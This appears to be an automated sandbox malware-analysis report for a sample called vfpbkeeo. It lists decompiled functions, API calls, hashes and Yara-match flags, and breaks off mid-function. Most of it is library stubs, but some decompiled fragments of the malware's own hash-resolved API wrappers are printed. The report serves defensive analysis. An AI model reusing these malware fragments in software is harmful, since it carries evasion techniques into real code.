                                                                                              Function 009E9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 04603358882b63899748ece2233933345350dbc360e6cb5a0ad567c17ee13255
                                                                                              • Instruction ID: 47e71a0a2fc3abf43ea178da6837c76d9c9347b5973450d2f55169c5b21d070d
                                                                                              • Opcode Fuzzy Hash: 04603358882b63899748ece2233933345350dbc360e6cb5a0ad567c17ee13255
                                                                                              • Instruction Fuzzy Hash: 4B90027120210813D22161594504717004A97D0381F92C422A1814558D96968952F261
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 5d0fe3105181a26615627a5184308602433a6bcb55a50402ce3b34d6fa965a55
                                                                                              • Instruction ID: f11d6b39c1ac004de670ea4fe0b007e8053afc4f7d29ac4d94d9a529a3817c52
                                                                                              • Opcode Fuzzy Hash: 5d0fe3105181a26615627a5184308602433a6bcb55a50402ce3b34d6fa965a55
                                                                                              • Instruction Fuzzy Hash: A79002A134210842D21061594414B160046D7E1341F52C025E2454554D8659CC52B266
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 2e55730799b529b0cd8b33dd4271312755d564195d5c44dae9417ff5507cfeec
                                                                                              • Instruction ID: 983e99d6ffff7d066b85327dfd111763032b034b95db3194873cefd4fbe17457
                                                                                              • Opcode Fuzzy Hash: 2e55730799b529b0cd8b33dd4271312755d564195d5c44dae9417ff5507cfeec
                                                                                              • Instruction Fuzzy Hash: 4B9002A120310403421571594414626404B97E0341B52C031E2404590DC5658891B265
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f7d6f1173fa82bd4a3b6b01dbce50c9c4d3ba0b8900f370f5cf6c8b8675ae230
                                                                                              • Instruction ID: 73379f3593dc99f048e26dba2b36f2bac3bf4a3e2fb8cf21a18ee6581f87be55
                                                                                              • Opcode Fuzzy Hash: f7d6f1173fa82bd4a3b6b01dbce50c9c4d3ba0b8900f370f5cf6c8b8675ae230
                                                                                              • Instruction Fuzzy Hash: 4C9002B120210802D25071594404756004697D0341F52C021A6454554E86998DD5B7A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 93ca6a42887e2c81e49dda0e4367a49e892c535afe6d2f60b0b375d1d37cf79f
                                                                                              • Instruction ID: 06be94599444444dbf9cb66e6dfc89ca2313e5f43c8e270d395c83a327888159
                                                                                              • Opcode Fuzzy Hash: 93ca6a42887e2c81e49dda0e4367a49e892c535afe6d2f60b0b375d1d37cf79f
                                                                                              • Instruction Fuzzy Hash: 4F900265212104030215A5590704517008797D5391352C031F2405550CD6618861B261
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: b8b7136f2c2a7375350de4bf54dccbbad00c04ec4e1edd25115ca6eaddb9012c
                                                                                              • Instruction ID: 53f38518ce12584f8c5ccb3ef34ac8df0e3e6c7a6ceff42d8fb1d145aab96293
                                                                                              • Opcode Fuzzy Hash: b8b7136f2c2a7375350de4bf54dccbbad00c04ec4e1edd25115ca6eaddb9012c
                                                                                              • Instruction Fuzzy Hash: 9D90027120218C02D2206159840475A004697D0341F56C421A5814658D86D58891B261
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 90fd0226ef3c8b569fd94b4866d0f61e0c3f838e1f785559deefaaf1bdc330bd
                                                                                              • Instruction ID: 82bacb6b9087f98857365fa31554eda67e25ecf922cec1d6a126ba3df6f49e56
                                                                                              • Opcode Fuzzy Hash: 90fd0226ef3c8b569fd94b4866d0f61e0c3f838e1f785559deefaaf1bdc330bd
                                                                                              • Instruction Fuzzy Hash: D790027120250802D2106159481471B004697D0342F52C021A2554555D86658851B6B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 3e368dd1c1f8fd5379ecc535b45e624285721cfc344f10670c4f68b15d09e5f2
                                                                                              • Instruction ID: 2664d2551bded430e2fa2350c75047e343980e9533ee78ee3224b126f1d55ab7
                                                                                              • Opcode Fuzzy Hash: 3e368dd1c1f8fd5379ecc535b45e624285721cfc344f10670c4f68b15d09e5f2
                                                                                              • Instruction Fuzzy Hash: 97900261602104424250716988449164046BBE1351752C131A1D88550D85998865B7A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: b5eac558b56be23f058dbe9e865d62809203a3b364e2354a972d43036bd06fb9
                                                                                              • Instruction ID: 37427a07966a3f0b9f6077e8fe0fcdce57f0ab02c3342332e23d4078028a564c
                                                                                              • Opcode Fuzzy Hash: b5eac558b56be23f058dbe9e865d62809203a3b364e2354a972d43036bd06fb9
                                                                                              • Instruction Fuzzy Hash: BF90026121290442D31065694C14B17004697D0343F52C125A1544554CC9558861B661
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: d21b5cf65f1925f50628b16cf93cae1dbf64e80ad30964c8838e971f12b6706a
                                                                                              • Instruction ID: a0b701badb098b4c238ab63ac2af189f8d462c86e6597d8a29e853637fd11bed
                                                                                              • Opcode Fuzzy Hash: d21b5cf65f1925f50628b16cf93cae1dbf64e80ad30964c8838e971f12b6706a
                                                                                              • Instruction Fuzzy Hash: 8190027120210C02D2907159440465A004697D1341F92C025A1415654DCA558A59B7E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 8719c31ceaacd6759cbb0f5c9d552c5d92f85aa3b700126e4e73a747095ce903
                                                                                              • Instruction ID: 3593e2d72f954226fb0b6ca3d16051608f94ef830120dc0f506d96614c6a101c
                                                                                              • Opcode Fuzzy Hash: 8719c31ceaacd6759cbb0f5c9d552c5d92f85aa3b700126e4e73a747095ce903
                                                                                              • Instruction Fuzzy Hash: F590026921310402D2907159540861A004697D1342F92D425A1405558CC9558869B361
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 0c27e728b26dda48e4c4c3a78bcfc30398d3d7c6b5c58961f8d02811c7e8fa7c
                                                                                              • Instruction ID: 3f82ee06c00f90c74ea4eb2e12748f5d0ca2db887c553fba8c28c91162c5d132
                                                                                              • Opcode Fuzzy Hash: 0c27e728b26dda48e4c4c3a78bcfc30398d3d7c6b5c58961f8d02811c7e8fa7c
                                                                                              • Instruction Fuzzy Hash: 2690026130210403D250715954186164046E7E1341F52D021E1804554CD9558856B362
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f0d674a9b7e12a022f98828d98edfa92eda11298aec14cea50a28769823ad15e
                                                                                              • Instruction ID: c93b43745367d26168a7f4703b8ba230b2a5b14d743563d0414e6855aba9216e
                                                                                              • Opcode Fuzzy Hash: f0d674a9b7e12a022f98828d98edfa92eda11298aec14cea50a28769823ad15e
                                                                                              • Instruction Fuzzy Hash: BB90027131224802D22061598404716004697D1341F52C421A1C14558D86D58891B262
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 7b4c17ec5e7be09c578db6642946784d949ef38ff371c3eb07ed0dfd39b26c11
                                                                                              • Instruction ID: 97c1ddc9044c30d7547ae8eadc9a72fa0eac3aed66d8aa841407fe9a9264fc16
                                                                                              • Opcode Fuzzy Hash: 7b4c17ec5e7be09c578db6642946784d949ef38ff371c3eb07ed0dfd39b26c11
                                                                                              • Instruction Fuzzy Hash: DF90027120210802D21065995408656004697E0341F52D021A6414555EC6A58891B271
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E9A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 41e9a3-41e9cf call 41f2c3 ExitProcess
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E9A3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F2C3( *((intOrPtr*)(_a4 + 0x348)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x348)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                              0x0041e9a6
                                                                                              0x0041e9bd
                                                                                              0x0041e9cb

                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E9CB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID: 5@
                                                                                              • API String ID: 621844428-819730362
                                                                                              • Opcode ID: e28993154b53108b58e94f83b74eb407a06c34db1f370d9b65a952e803c3579a
                                                                                              • Instruction ID: 9ae63f680415e1927269c6793def9c843dcdcca69e3efd32bde9dd3324d93fbd
                                                                                              • Opcode Fuzzy Hash: e28993154b53108b58e94f83b74eb407a06c34db1f370d9b65a952e803c3579a
                                                                                              • Instruction Fuzzy Hash: 9CD012756003147BC620DB99CC45FD7779CDF45654F0144A5BA4C5B241D575BA40C7E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409913 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 84%
                                                                                              			E00409913(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420293( &_v67, 0, 0x3f);
				E00420D43( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF93(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419663(_a4 + 0x20, _t13, 0, 0, E00402E83(0x1f96e3de));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C663(1, 8, _t19 + 0x89c) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                                                              0x00409913
                                                                                              0x00409924
                                                                                              0x00409928
                                                                                              0x00409933
                                                                                              0x00409938
                                                                                              0x00409943
                                                                                              0x0040995b
                                                                                              0x00409960
                                                                                              0x00409967
                                                                                              0x00409969
                                                                                              0x00409976
                                                                                              0x0040997a
                                                                                              0x00000000
                                                                                              0x0040999e
                                                                                              0x0040997a
                                                                                              0x004099a6

                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(0000F620,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID:
                                                                                              • API String ID: 1836367815-0
                                                                                              • Opcode ID: abef5e8908b02b685c1bd395a5e16b9fff859b5b0781d6e8639e2d85d0328828
                                                                                              • Instruction ID: 4e81955c47fcf3b4c035f565be8bfaf73f4b6f5db0e898904b7d8334ffaf4087
                                                                                              • Opcode Fuzzy Hash: abef5e8908b02b685c1bd395a5e16b9fff859b5b0781d6e8639e2d85d0328828
                                                                                              • Instruction Fuzzy Hash: C3018871A4021877E7206695EC82FEF776C9B41B54F14016DFB04BA1C2D6A96D0543E9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E963 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 304 41e963-41e994 call 41f2c3 RtlFreeHeap
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E963(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F2C3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                              0x0041e972
                                                                                              0x0041e97a
                                                                                              0x0041e990
                                                                                              0x0041e994

                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,7C5649E5,00000000,?), ref: 0041E990
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                              • Instruction ID: f099d7f2c81d31d5920fe0e9ab737e0ae06602387c452fca91f394fa21f8213b
                                                                                              • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                              • Instruction Fuzzy Hash: 18E012B5600208ABCB14EF89DC49EA737ACAF88754F018459BA095B282D630E914CAB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410113 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 296 410113-410137 call 419663 299 410139-41013a 296->299 300 41013b-41014c GetUserGeoID 296->300
                                                                                              C-Code - Quality: 37%
                                                                                              			E00410113(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419663(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                                              0x0041012d
                                                                                              0x00410137
                                                                                              0x0041013d
                                                                                              0x0041014c
                                                                                              0x0041013a
                                                                                              0x0041013a
                                                                                              0x0041013a

                                                                                              APIs
                                                                                              • GetUserGeoID.KERNELBASE(00000010), ref: 0041013D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: User
                                                                                              • String ID:
                                                                                              • API String ID: 765557111-0
                                                                                              • Opcode ID: b07fe1e0b831da6324c709ae2ee113a1a2a707ef7a271a80feb8d051264812d7
                                                                                              • Instruction ID: 085965643a4fee5cd53ffe94b3e5c49d49328dd0210d989ec803413f8a03a687
                                                                                              • Opcode Fuzzy Hash: b07fe1e0b831da6324c709ae2ee113a1a2a707ef7a271a80feb8d051264812d7
                                                                                              • Instruction Fuzzy Hash: DAE0C27368030466F62091A58C86FA6324E5B84B10F048475F90CDA2C1E599E8C04024
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E923 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 301 41e923-41e954 call 41f2c3 RtlAllocateHeap
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E923(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F2C3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                              0x0041e932
                                                                                              0x0041e93a
                                                                                              0x0041e950
                                                                                              0x0041e954

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00418D19,?,004194C0,004194C0,?,00418D19,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E950
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                              • Instruction ID: 35f9b3720eda2a9350cd28b113164475d9d29aa42e74404f42a7c5959d1ddaec
                                                                                              • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                              • Instruction Fuzzy Hash: A0E046B6600208ABCB14EF89DC45EE737ACEF88764F018459FE085B242C630F914CAF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041EAC3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 307 41eac3-41eaf7 call 41f2c3 LookupPrivilegeValueW
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041EAC3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F2C3( *((intOrPtr*)(_a4 + 0x320)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x320)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                              0x0041eadd
                                                                                              0x0041eaf3
                                                                                              0x0041eaf7

                                                                                              APIs
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF65,0040FF65,?,00000000,?,?), ref: 0041EAF3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LookupPrivilegeValue
                                                                                              • String ID:
                                                                                              • API String ID: 3899507212-0
                                                                                              • Opcode ID: 59c6a71a46ac23bc1f8d2d2864c944e9dacf24b7015ed487b283a0e8aa3d6214
                                                                                              • Instruction ID: 2f132e903f75c03d5644b81af7618e928f141eda562dca8a42018eaf51c340a8
                                                                                              • Opcode Fuzzy Hash: 59c6a71a46ac23bc1f8d2d2864c944e9dacf24b7015ed487b283a0e8aa3d6214
                                                                                              • Instruction Fuzzy Hash: E9E01AB56002046BC714DF89CC45EE737ADAF88654F014469BA0857242D635E9148AB5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 313 9e967a-9e967f 314 9e968f-9e9696 LdrInitializeThunk 313->314 315 9e9681-9e9688 313->315
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: b764183a989f4b0083b05aa234de2417357e936485622650b9da437f1f5a6e34
                                                                                              • Instruction ID: fa496d26cdc2e3f349e6258d02a8945eb7a801a47ba8307d932c5812d3898e97
                                                                                              • Opcode Fuzzy Hash: b764183a989f4b0083b05aa234de2417357e936485622650b9da437f1f5a6e34
                                                                                              • Instruction Fuzzy Hash: 32B09B719025C5D5D721D7614608727794577D0745F17C062D2420641A4778C4D1F6B5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 009D6A60 Relevance: .2, Instructions: 227COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 66%
                                                                                              			E009D6A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
